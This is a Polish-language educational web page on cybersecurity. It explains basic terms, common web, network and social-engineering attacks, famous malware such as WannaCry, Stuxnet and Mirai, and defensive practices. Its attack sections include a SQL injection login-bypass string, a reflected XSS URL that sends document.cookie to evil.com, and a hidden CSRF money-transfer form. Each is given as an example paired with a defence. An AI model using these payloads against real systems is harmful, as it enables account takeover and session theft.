🔒 Cyberbezpieczeństwo

Pojęcia, znane ataki, wirusy i jak się przed nimi bronić

🔐 Podstawy i terminologia
Triada CIA
Trzy fundamentalne zasady bezpieczeństwa informacji:
Confidentiality (poufność) — tylko uprawnione osoby mają dostęp do danych.
Integrity (integralność) — dane nie zostały zmodyfikowane bez autoryzacji.
Availability (dostępność) — systemy i dane są dostępne wtedy, gdy są potrzebne.
Zagrożenie, podatność, ryzyko
Zagrożenie (threat) — potencjalne zdarzenie mogące zaszkodzić systemowi.
Podatność (vulnerability) — słabość systemu, którą można wykorzystać.
Ryzyko (risk) — prawdopodobieństwo, że zagrożenie wykorzysta podatność.
Exploit — kod lub technika wykorzystująca podatność.
Malware (złośliwe oprogramowanie)
Oprogramowanie zaprojektowane do wyrządzania szkód. Typy:
Wirus — zaraża pliki, potrzebuje nosiciela.
Robak (worm) — rozprzestrzenia się samodzielnie po sieci.
Trojan — ukrywa się w legalnym oprogramowaniu.
Ransomware — szyfruje dane i żąda okupu.
Spyware — szpieguje użytkownika.
Keylogger — rejestruje naciśnięcia klawiszy.
Rootkit — ukrywa swoją obecność w systemie.
Botnet — sieć zainfekowanych komputerów (zombie).
Phishing
Atak polegający na podszywaniu się pod zaufaną osobę lub instytucję w celu wyłudzenia danych (hasła, dane karty, dane osobowe). Odmiany: Spear phishing (celowany w konkretną osobę), Whaling (ataki na kadrę zarządzającą), Smishing (SMS), Vishing (telefon).
Fałszywy e-mail od "banku" z linkiem do podstawionej strony logowania
Social Engineering
Manipulowanie ludźmi w celu uzyskania poufnych informacji lub wykonania określonych działań. Atakujący używa psychologii, a nie techniki — strachu, pilności, autorytetu lub zaufania.
"Jestem z IT, potrzebuję Twojego hasła, bo mamy awarię" — pretexting (zmyślony scenariusz)
Zero-day
Podatność w oprogramowaniu, o której producent jeszcze nie wie (lub dla której nie ma jeszcze patcha). Bardzo ceniona przez atakujących — brak obrony w momencie ataku. Nazwa pochodzi od "zero dni" do naprawy.
Uwierzytelnianie i autoryzacja
Uwierzytelnianie (authentication) — potwierdzenie tożsamości ("Kim jesteś?").
Autoryzacja (authorization) — sprawdzenie uprawnień ("Co możesz zrobić?").
MFA/2FA — wieloskładnikowe uwierzytelnianie: coś co wiesz (hasło) + coś co masz (token/SMS) + coś czym jesteś (biometria).
Szyfrowanie
Symetryczne — ten sam klucz do szyfrowania i deszyfrowania (szybkie, np. AES). Asymetryczne — para kluczy: publiczny (do szyfrowania) i prywatny (do deszyfrowania), np. RSA.
SSL/TLS — protokół szyfrujący komunikację w sieci (HTTPS = HTTP + TLS).
End-to-end (E2E) — tylko nadawca i odbiorca mogą odczytać wiadomość.
Firewall, IDS, IPS
Firewall — filtruje ruch sieciowy na podstawie reguł (co wpuszczać, co blokować).
IDS (Intrusion Detection System) — wykrywa podejrzany ruch i alertuje.
IPS (Intrusion Prevention System) — wykrywa i aktywnie blokuje ataki.
WAF (Web Application Firewall) — chroni aplikacje webowe przed atakami (SQL Injection, XSS).
VPN (Virtual Private Network)
Tworzy szyfrowany tunel między urządzeniem a serwerem VPN. Ukrywa prawdziwy adres IP i chroni ruch przed podsłuchiwaniem w publicznych sieciach WiFi. Używany też do omijania blokad geograficznych i łączenia zdalnych sieci firmowych.
Penetration Testing (Pentest)
Kontrolowany, autoryzowany atak na system w celu znalezienia podatności, zanim zrobi to prawdziwy atakujący. Przeprowadzany przez etycznych hakerów (white hat). Typy: Black box (bez wiedzy o systemie), White box (pełna wiedza), Grey box (częściowa wiedza).
OWASP Top 10
Lista 10 najpoważniejszych zagrożeń dla aplikacji webowych, publikowana przez organizację OWASP. Punkt odniesienia dla każdego dewelopera i pentestera. Zawiera m.in. Injection, Broken Authentication, XSS, Insecure Deserialization, Security Misconfiguration.
💉 Ataki na aplikacje webowe
💉
SQL Injection (SQLi)
Krytyczne Aplikacje webowe
Wstrzykiwanie złośliwego kodu SQL do zapytań do bazy danych przez niesanitizowane pola formularzy. Może prowadzić do wycieku, modyfikacji lub usunięcia całej bazy danych oraz ominięcia logowania.
Jak działa
  • Formularz logowania oczekuje: SELECT * FROM users WHERE login='X' AND pass='Y'
  • Atakujący wpisuje w pole login: ' OR '1'='1' --
  • Zapytanie staje się: SELECT * FROM users WHERE login='' OR '1'='1' --' AND pass='...'
  • Warunek '1'='1' jest zawsze prawdziwy → dostęp bez hasła
Obrona: prepared statements (parametryzowane zapytania), ORM, walidacja i sanityzacja danych wejściowych, WAF, zasada minimalnych uprawnień dla konta DB.
📜
Cross-Site Scripting (XSS)
Wysokie Aplikacje webowe
Wstrzykiwanie złośliwego skryptu JavaScript do strony, który wykonuje się w przeglądarce ofiary. Może wykraść ciasteczka sesji, przekierować użytkownika, lub wykonywać akcje w jego imieniu.
Jak działa (Reflected XSS)
  • Atakujący tworzy link z złośliwym kodem: https://bank.pl/search?q=<script>document.location='evil.com/steal?c='+document.cookie</script>
  • Ofiara klika link, strona odbija parametr bez sanityzacji
  • Skrypt wykonuje się w przeglądarce ofiary i wysyła jej cookies do atakującego
  • Atakujący przejmuje sesję ofiary
Obrona: escapowanie danych wyjściowych (HTML encoding), Content Security Policy (CSP), flagi HttpOnly i Secure na ciasteczkach, walidacja danych wejściowych.
🔄
Cross-Site Request Forgery (CSRF)
Wysokie Aplikacje webowe
Zmuszenie zalogowanego użytkownika do nieświadomego wykonania niepożądanej akcji na stronie, na której jest zalogowany. Przeglądarka automatycznie dołącza ciasteczka sesji do każdego żądania.
Jak działa
  • Ofiara jest zalogowana w banku (ma aktywną sesję)
  • Odwiedza złośliwą stronę kontrolowaną przez atakującego
  • Strona zawiera ukryty formularz: <form action="bank.pl/transfer" method="POST"><input name="amount" value="5000"><input name="to" value="konto_hakera"></form>
  • Formularz automatycznie się wysyła — bank widzi legalne żądanie z sesją ofiary
Obrona: CSRF tokeny (unikalny token w każdym formularzu), nagłówek SameSite na ciasteczkach, weryfikacja nagłówka Origin/Referer.
🌐 Ataki sieciowe
🕵️
Man-in-the-Middle (MitM)
Krytyczne Sieć
Atakujący wstawia się pomiędzy dwie komunikujące się strony, przechwytując i ewentualnie modyfikując przesyłane dane — obie strony myślą, że rozmawiają bezpośrednio ze sobą.
Jak działa (ARP Spoofing w sieci lokalnej)
  • Atakujący i ofiara są w tej samej sieci WiFi (np. kawiarnia)
  • Atakujący wysyła fałszywe pakiety ARP: "jestem routerem" do ofiary i "jestem ofiarą" do routera
  • Cały ruch ofiary przechodzi przez komputer atakującego
  • Atakujący może czytać dane, modyfikować je lub wstrzykiwać złośliwy kod
Obrona: używaj HTTPS (szyfruje ruch nawet przez MitM), VPN w publicznych sieciach, weryfikuj certyfikaty SSL, HSTS (HTTP Strict Transport Security).
💥
DDoS (Distributed Denial of Service)
Krytyczne Sieć / Infrastruktura
Zalanie serwera ogromną ilością ruchu z wielu źródeł (botnet) w celu uniemożliwienia dostępu legalnym użytkownikom. Atakujący nie włamuje się — po prostu "zatyka" serwer.
Jak działa
  • Atakujący wcześniej infekuje tysiące komputerów (botnet) — właściciele nie wiedzą
  • Wydaje rozkaz: wszystkie komputery jednocześnie wysyłają zapytania do celu
  • Serwer docelowy otrzymuje miliony żądań na sekundę — przepustowość i zasoby są wyczerpane
  • Legalni użytkownicy nie mogą się połączyć — strona "pada"
Obrona: CDN z ochroną DDoS (Cloudflare, AWS Shield), rate limiting, anycast network diffusion, firewalle filtrujące anomalny ruch, plany reagowania na incydenty.
🔑
Brute Force i Credential Stuffing
Wysokie Uwierzytelnianie
Brute force — systematyczne wypróbowywanie wszystkich możliwych kombinacji hasła. Dictionary attack — wypróbowywanie słów ze słownika. Credential stuffing — używanie wyciekniętych par login/hasło z innych serwisów (wiele osób używa tych samych haseł wszędzie).
Jak działa credential stuffing
  • Atakujący kupuje/pobiera bazę wyciekniętych loginów i haseł (np. z wycieku Facebooka)
  • Automatyzuje próby logowania na innych serwisach (bank, Gmail, Amazon)
  • Nawet 1–2% skuteczności przy milionach danych = tysiące przejętych kont
Obrona: MFA/2FA (nawet ze skradzionym hasłem nie ma dostępu), rate limiting logowań, CAPTCHA, unikalne hasła w każdym serwisie, menedżer haseł, monitorowanie wycieków (haveibeenpwned.com).
🎭 Ataki socjotechniczne i złośliwe oprogramowanie
🎣
Phishing / Spear Phishing
Krytyczne Social Engineering
Masowy phishing wysyła te same wiadomości do milionów osób licząc na przypadkowe ofiary. Spear phishing to precyzyjny atak na konkretną osobę lub firmę — atakujący wcześniej zbiera informacje o ofierze (LinkedIn, media społecznościowe).
Jak działa spear phishing
  • Atakujący researches ofiarę: imię szefa, projekty w toku, styl komunikacji firmy
  • Tworzy e-mail wyglądający jak od szefa: "Potrzebuję pilnie przelewu 20 000 zł na nowe konto dostawcy"
  • Ofiara (np. księgowy) nie weryfikuje — wykonuje przelew
  • Metoda Business Email Compromise (BEC) — miliardy strat rocznie na świecie
Obrona: weryfikacja telefoniczna nietypowych próśb, szkolenia pracowników, SPF/DKIM/DMARC (weryfikacja nadawcy e-mail), zgłaszanie podejrzanych wiadomości, nieufność wobec "pilnych" próśb.
🔒
Ransomware
Krytyczne Malware
Złośliwe oprogramowanie szyfrujące pliki ofiary i żądające okupu (najczęściej w kryptowalucie) za klucz deszyfrujący. Jeden z najbardziej dochodowych typów ataków — atakuje firmy, szpitale, infrastrukturę krytyczną.
Typowy przebieg ataku ransomware
  • Wektor infekcji: phishing (złośliwy załącznik), podatna usługa RDP, zainfekowane oprogramowanie
  • Malware instaluje się i czeka, eksplorując sieć, eskalując uprawnienia
  • Wykrada dane (podwójne wymuszenie: "zapłać albo opublikujemy dane")
  • Szyfruje wszystkie pliki na dostępnych dyskach i udziałach sieciowych
  • Wyświetla żądanie okupu z terminem i adresem portfela kryptowalutowego
Obrona: regularne backupy offline (reguła 3-2-1), segmentacja sieci, zasada najmniejszych uprawnień, EDR (Endpoint Detection and Response), łatanie podatności, szkolenia antyphishingowe.
🏛️ Przełomowe złośliwe oprogramowanie w historii
WannaCry
2017 · Ransomware · Globalny
Robak-ransomware wykorzystujący exploit EternalBlue (skradziony z NSA), atakujący lukę w protokole SMB systemu Windows. Zainfekował ponad 200 000 komputerów w 150 krajach w ciągu kilku godzin. Sparaliżował m.in. brytyjską służbę zdrowia NHS i Telefónicę.
Straty: szacowane na 4–8 miliardów dolarów. Zatrzymany przez przypadkowy kill switch odkryty przez badacza bezpieczeństwa.
NotPetya
2017 · Wiper/Ransomware · Ukraina → Globalny
Pozornie ransomware, w rzeczywistości cyberbroń niszcząca dane (wiper) — nie było możliwości odzyskania danych nawet po zapłacie. Rozprzestrzenił się przez zainfekowaną aktualizację ukraińskiego oprogramowania księgowego M.E.Doc. Uderzył w Maersk, Merck, FedEx.
Straty: ponad 10 miliardów dolarów — największa cyberatak w historii. Przypisany rosyjskiej grupie Sandworm (GRU).
Stuxnet
2010 · Cyberbroń · Iran
Pierwsza znana cyberbroń zaprojektowana do fizycznego niszczenia infrastruktury. Atakował sterowniki PLC Siemens kontrolujące wirówki do wzbogacania uranu w irańskim zakładzie Natanz. Sabotował wirówki, jednocześnie wyświetlając operatorom normalne odczyty.
Zniszczył ok. 1000 wirówek, opóźniając irański program nuklearny o 1–2 lata. Przypisany USA i Izraelowi (operacja Olympic Games).
ILOVEYOU
2000 · Robak · Globalny
Robak rozprzestrzeniający się przez e-mail z załącznikiem "LOVE-LETTER-FOR-YOU.txt.vbs". Po otwarciu nadpisywał pliki graficzne i muzyczne, rozsyłał się do wszystkich kontaktów w Outlooku. Jeden z pierwszych wirusów, który przeszedł ze świata geek do mainstreamu.
Zainfekował 45 milionów komputerów w ciągu 10 dni. Straty: ok. 10 miliardów dolarów. Autorzy z Filipin — uniknęli kary (brak prawa o cyberprzestępczości).
Mirai Botnet
2016 · Botnet/DDoS · Globalny
Botnet złożony głównie z urządzeń IoT (kamery IP, routery, rejestratory DVR) zainfekowanych przez domyślne hasła. Wykorzystany do rekordowego ataku DDoS na DNS provider Dyn — sparaliżował Twitter, Netflix, Reddit, PayPal na wiele godzin.
Szczytowy ruch ataku: 1,2 Tbps. Kod źródłowy opublikowany — do dziś używany w wariantach. Stworzony przez… studentów college'u.
Zeus / Zbot
2007–dziś · Trojan bankowy · Globalny
Trojan przeznaczony do kradzieży danych bankowych poprzez keylogging i przechwytywanie formularzy. Atakował głównie Windows, używał techniki "man-in-the-browser" — modyfikował strony bankowe w przeglądarce ofiary w czasie rzeczywistym.
Zainfekował ponad 3,6 miliona komputerów w USA. Po wycieku kodu źródłowego w 2011 r. stworzono dziesiątki wariantów (Citadel, GameOver ZeuS, SpyEye).
CryptoLocker
2013–2014 · Ransomware · Globalny
Pierwszy nowoczesny ransomware używający silnego szyfrowania RSA-2048. Rozsyłany przez e-mail (fałszywe faktury, przesyłki). Żądał okupu w Bitcoin lub MoneyPak — pionier modelu biznesowego ransomware.
Zainfekował ok. 500 000 komputerów, zarobił ok. 3 miliony dolarów. Zlikwidowany w 2014 przez operację Tovar (Europol + FBI + prywatne firmy).
Morris Worm
1988 · Robak · Internet (ARPANET)
Pierwszy robak internetowy, który przyciągnął powszechną uwagę. Atakował luki w Unix sendmail, fingerd i rsh. Nie był stworzony do destrukcji — ale błąd w kodzie powodował wielokrotną infekcję i spowalniał komputery do zatrzymania.
Zainfekował ok. 6000 komputerów (10% ówczesnego internetu). Jego autor Robert Morris — pierwszy skazany na mocy Computer Fraud and Abuse Act.
🛡️ Zabezpieczenia podstawowe
🔑 Silne hasła i menedżer haseł
  • Minimum 16 znaków — długość ważniejsza niż złożoność
  • Unikalne hasło dla każdego serwisu — nigdy nie powtarzaj
  • Używaj menedżera haseł (Bitwarden, 1Password, KeePass)
  • Sprawdź wycieki: haveibeenpwned.com
  • Nie używaj danych osobowych (imię, data urodzenia, miasto)
📱 Wieloskładnikowe uwierzytelnianie (MFA)
  • Włącz 2FA/MFA wszędzie gdzie to możliwe
  • Preferuj aplikacje authenticator (Google Auth, Authy) zamiast SMS
  • SMS-owe 2FA podatne na SIM swapping, ale wciąż lepsze niż brak 2FA
  • Klucze fizyczne U2F/FIDO2 (YubiKey) — najwyższy poziom ochrony
  • Zapisz kody zapasowe (backup codes) w bezpiecznym miejscu
🔄 Aktualizacje i łatanie podatności
  • Włącz automatyczne aktualizacje systemu operacyjnego
  • Aktualizuj oprogramowanie i wtyczki (szczególnie przeglądarkę)
  • Usuń nieużywane oprogramowanie — mniejsza powierzchnia ataku
  • Aktualizuj firmware routera i urządzeń IoT
  • Śledź CVE (Common Vulnerabilities and Exposures) dla używanego software
💾 Backup — reguła 3-2-1
  • 3 kopie danych (oryginał + 2 backupy)
  • 2 różne nośniki (dysk lokalny + chmura)
  • 1 kopia offline / poza siecią (odporność na ransomware)
  • Regularnie testuj przywracanie z backupu
  • Szyfruj backupy — szczególnie te w chmurze
🌐 Bezpieczna sieć
  • Używaj VPN w publicznych sieciach WiFi
  • Zmień domyślne hasło routera i wyłącz zdalne zarządzanie
  • Używaj DNS-over-HTTPS (DoH) lub DNS-over-TLS (DoT)
  • Segmentuj sieć — IoT oddzielnie od komputerów
  • Sprawdzaj certyfikat SSL — kłódka w przeglądarce (HTTPS)
📧 Bezpieczeństwo e-mail
  • Nie otwieraj załączników z nieznanych źródeł
  • Sprawdzaj adres nadawcy — nie tylko wyświetlaną nazwę
  • Nie klikaj linków w e-mailach — wchodź na strony ręcznie
  • Administratorzy: skonfiguruj SPF, DKIM i DMARC
  • Używaj filtrów antyphishingowych (wbudowane w Gmail, Outlook)
🏢 Zabezpieczenia dla firm i deweloperów
👨‍💻 Bezpieczne programowanie
  • Waliduj i sanityzuj wszystkie dane wejściowe
  • Używaj prepared statements — zapobiegaj SQL Injection
  • Escapuj dane wyjściowe — zapobiegaj XSS
  • Nie przechowuj haseł w plaintext — używaj bcrypt/Argon2
  • Stosuj zasadę najmniejszych uprawnień (POLP)
  • Przeprowadzaj code review pod kątem bezpieczeństwa
🔍 Monitoring i wykrywanie
  • Zbieraj i analizuj logi (SIEM — Security Information and Event Management)
  • Ustaw alerty na podejrzane aktywności (wiele nieudanych logowań, transfer danych)
  • EDR (Endpoint Detection & Response) na stacjach roboczych
  • Regularne skanowanie podatności (Nessus, OpenVAS)
  • Testuj ochronę — symulowane ataki phishingowe dla pracowników
🏛️ Zasady organizacyjne
  • Polityka haseł i obowiązkowe MFA
  • Zasada least privilege — minimalny dostęp potrzebny do pracy
  • Segmentacja sieci — izolacja krytycznych systemów
  • Plan reagowania na incydenty (Incident Response Plan)
  • Regularne szkolenia z cyberbezpieczeństwa dla pracowników
  • Zarządzanie dostępem uprzywilejowanym (PAM)
💡 Złote zasady cyberbezpieczeństwa
Zasada #1
Człowiek jest najsłabszym ogniwem. Większość udanych ataków zaczyna się od phishingu lub social engineeringu, nie od hakowania. Najlepszy firewall nie pomoże, jeśli pracownik kliknie złośliwy link. Inwestuj w szkolenia równie mocno jak w technologię.
Zasada #2
Zero Trust — nie ufaj, zawsze weryfikuj. Zakładaj, że sieć wewnętrzna jest już skompromitowana. Weryfikuj tożsamość i uprawnienia przy każdym żądaniu, niezależnie czy pochodzi z zewnątrz czy środka organizacji.
Zasada #3
Defense in Depth — wiele warstw ochrony. Żadne pojedyncze zabezpieczenie nie jest niezawodne. Warstwy: firewall → IDS → EDR → MFA → szyfrowanie → backup → monitoring. Atakujący musi przebić się przez wszystkie.
Zasada #4
Nie "jeśli" ale "kiedy" — zakładaj naruszenie. Planuj na wypadek, że atak się uda. Miej plan Incident Response, regularne backupy i procedury komunikacji kryzysowej. Szybka reakcja minimalizuje straty.
Zasada #5
Aktualizacje to bezpieczeństwo. Większość udanych ataków wykorzystuje znane podatności, dla których istnieją już patche. WannaCry zainfekował komputery z niezałataną podatnością, dla której patch był dostępny od 2 miesięcy.